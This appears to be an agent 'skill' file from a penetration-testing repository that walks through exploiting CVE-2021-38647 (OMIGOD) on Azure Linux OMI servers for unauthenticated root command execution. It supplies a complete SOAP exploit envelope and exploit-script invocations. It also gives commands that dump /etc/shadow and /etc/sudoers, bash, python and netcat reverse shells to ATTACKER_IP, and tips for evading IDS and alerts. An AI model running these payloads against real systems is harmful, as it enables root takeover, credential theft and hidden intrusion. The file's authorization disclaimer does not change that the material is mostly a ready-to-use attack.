Hacktricks-skills omi-cve-2021-38647-exploit

Exploit CVE-2021-38647 on Azure Linux servers running OMI (Open Management Infrastructure) to achieve root RCE. Use this skill whenever you need to test for or exploit the OMI vulnerability on ports 5985/5986, especially when you discover Azure Automation, Azure Log Analytics, or Azure Operations Management Suite services running on a target. This is critical for Azure penetration testing engagements where OMI services are detected.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/5985-5986-pentesting-omi/SKILL.MD
source content

OMI CVE-2021-38647 Exploitation

Overview

This skill helps you exploit CVE-2021-38647 ("OMIGOD"), a critical remote code execution vulnerability in Microsoft's Open Management Infrastructure (OMI), the CIM/WS-Management agent that Azure Linux extensions (Azure Automation, Log Analytics, Operations Management Suite, Desired State Configuration) install on VMs. An unauthenticated attacker who can reach the /wsman endpoint can execute commands as root simply by sending a WS-Management request with no Authorization header at all.

When to Use This Skill

Use this skill when:

  • You discover ports 5985 (HTTP) or 5986 (HTTPS) open on a target (1270 is the port used when the SCOM agent enabled OMI)
  • You identify Azure Linux servers with OMI services (Azure Automation, Log Analytics, Operations Management Suite)
  • You see the omiengine or omiserver process running on a target
  • You're conducting authorized penetration testing on Azure infrastructure
  • You need to validate OMI vulnerability exposure in a security assessment

Note that a default OMI install only listens on a local Unix socket; it listens on a TCP port only when one of the agents above enabled it. No open port means no remote exposure, even if the installed OMI version is vulnerable.

Vulnerability Details

CVE-2021-38647 affects OMI versions prior to 1.6.8.1 (package version 1.6.8-1). The vulnerability exists in how OMI authenticates WS-Management requests delivered to the /wsman endpoint:

  • No authentication required - A request that omits the Authorization header entirely (not an empty or invalid one) is treated as an already-authenticated client with uid 0 and gid 0
  • Root privilege execution - The request is then handled by the root-privileged OMI server, so the command runs as root
  • SOAP-based attack - Exploitation is a single SOAP envelope invoking the ExecuteShellCommand method of the SCX_OperatingSystem CIM class in the root/scx namespace

Quick Exploitation

Using the Built-in Script

The easiest way to exploit this vulnerability is using the provided script:

# Test connectivity and execute a command
python scripts/omi-exploit.py --target <IP> --port 5985 --command "id"

# Use HTTPS (port 5986)
python scripts/omi-exploit.py --target <IP> --port 5986 --command "whoami" --https

# Execute a reverse shell
python scripts/omi-exploit.py --target <IP> --port 5985 --command "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Manual SOAP Payload

If you prefer to craft the payload manually, use this template:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd">
  <s:Header>
    <a:To>http://TARGET_IP:5985/wsman</a:To>
    <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
    <a:ReplyTo>
      <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
    </a:ReplyTo>
    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
    <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
    <a:MessageID>uuid:12345678-1234-1234-1234-123456789012</a:MessageID>
    <w:OperationTimeout>PT1M30S</w:OperationTimeout>
    <w:SelectorSet>
      <w:Selector Name="__cimnamespace">root/scx</w:Selector>
    </w:SelectorSet>
  </s:Header>
  <s:Body>
    <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
      <p:command>YOUR_COMMAND_HERE</p:command>
      <p:timeout>0</p:timeout>
    </p:ExecuteShellCommand_INPUT>
  </s:Body>
</s:Envelope>

Replace TARGET_IP and YOUR_COMMAND_HERE with your values, then POST the envelope to /wsman with Content-Type: application/soap+xml;charset=UTF-8 and no Authorization header. The missing header is the trigger: an empty or bogus Authorization value is rejected, so do not send one. XML-escape the command (& as &amp;, > as &gt;, < as &lt;) or shell redirections such as the reverse-shell one-liners below will break the envelope. The w:ResourceURI header and the __cimnamespace selector (root/scx) identify the SCX_OperatingSystem class the method belongs to; without them the server cannot route the invoke. A successful reply carries an ExecuteShellCommand_OUTPUT element with ReturnCode, StdOut and StdErr children.

Common Commands

Reconnaissance

# Check if vulnerable (should return root)
python scripts/omi-exploit.py --target <IP> --port 5985 --command "id"

# Get system info
python scripts/omi-exploit.py --target <IP> --port 5985 --command "uname -a"

# Check OMI version (there is no "omi" binary; ask the server itself or the package manager)
python scripts/omi-exploit.py --target <IP> --port 5985 --command "/opt/omi/bin/omiserver --version; rpm -q omi 2>/dev/null; dpkg -s omi 2>/dev/null | grep Version"

Post-Exploitation (commands already run as root, so no escalation is needed)

# List sudoers
python scripts/omi-exploit.py --target <IP> --port 5985 --command "cat /etc/sudoers"

# Check for sensitive files
python scripts/omi-exploit.py --target <IP> --port 5985 --command "cat /etc/shadow"

# List users
python scripts/omi-exploit.py --target <IP> --port 5985 --command "cat /etc/passwd"

Reverse Shell

# Bash reverse shell
python scripts/omi-exploit.py --target <IP> --port 5985 --command "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

# Python reverse shell (if available)
python scripts/omi-exploit.py --target <IP> --port 5985 --command "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"])'"

# Netcat reverse shell (if available)
python scripts/omi-exploit.py --target <IP> --port 5985 --command "nc -e /bin/bash ATTACKER_IP 4444"

Detection and Evasion

Signs the Attack Is Blocked or the Target Is Patched

  • Firewall or NSG rules blocking port 5985/5986 (connection refused or timeout)
  • IDS/IPS alerts on the SOAP traffic; the ExecuteShellCommand action URI is a plain-text signature on port 5985
  • OMI version 1.6.8.1 or later on the target
  • HTTP 401 for requests without an Authorization header (vulnerability not present)

Evasion Techniques

  • Use HTTPS (port 5986) so the SOAP body and the ExecuteShellCommand action are not visible to network IDS
  • Rate limit requests to avoid triggering alerts
  • Use encoded or obfuscated commands
  • Time attacks during maintenance windows

Verification

Before exploitation, verify the target is vulnerable:

# Check if port is open
nmap -p 5985,5986 <TARGET_IP>

# Confirm a listener answers on /wsman (a GET executes nothing and does not reveal the version)
curl -v http://<TARGET_IP>:5985/wsman

# Quick vulnerability test
python scripts/omi-exploit.py --target <IP> --port 5985 --command "echo vulnerable"

Safety and Legal Considerations

⚠️ IMPORTANT: Only use this skill on systems you have explicit authorization to test. Unauthorized exploitation of CVE-2021-38647 is illegal and can result in severe legal consequences.

  • Ensure you have written authorization before testing
  • Document all testing activities
  • Report findings to system owners
  • Do not use in production environments without approval

Troubleshooting

Connection Refused

  • Verify port 5985/5986 is open
  • Check firewall rules on target
  • Confirm OMI service is running

Authentication Required (HTTP 401)

  • Target is patched (OMI 1.6.8.1 or later): requests without an Authorization header are now rejected
  • Vulnerability not present on this system; record the version and move on
  • Sending an empty or fake Authorization header does not help, the bypass relies on the header being absent

Timeout Errors

  • Increase w:OperationTimeout in the SOAP header (and the per-command p:timeout, where 0 means no limit) for long-running commands
  • Check network connectivity
  • Verify target is reachable

Command Execution Fails

  • Check command syntax
  • Verify command exists on target
  • Try simpler commands first (e.g., id, whoami)
  • Make sure shell metacharacters (&, <, >) are XML-escaped if you send the envelope by hand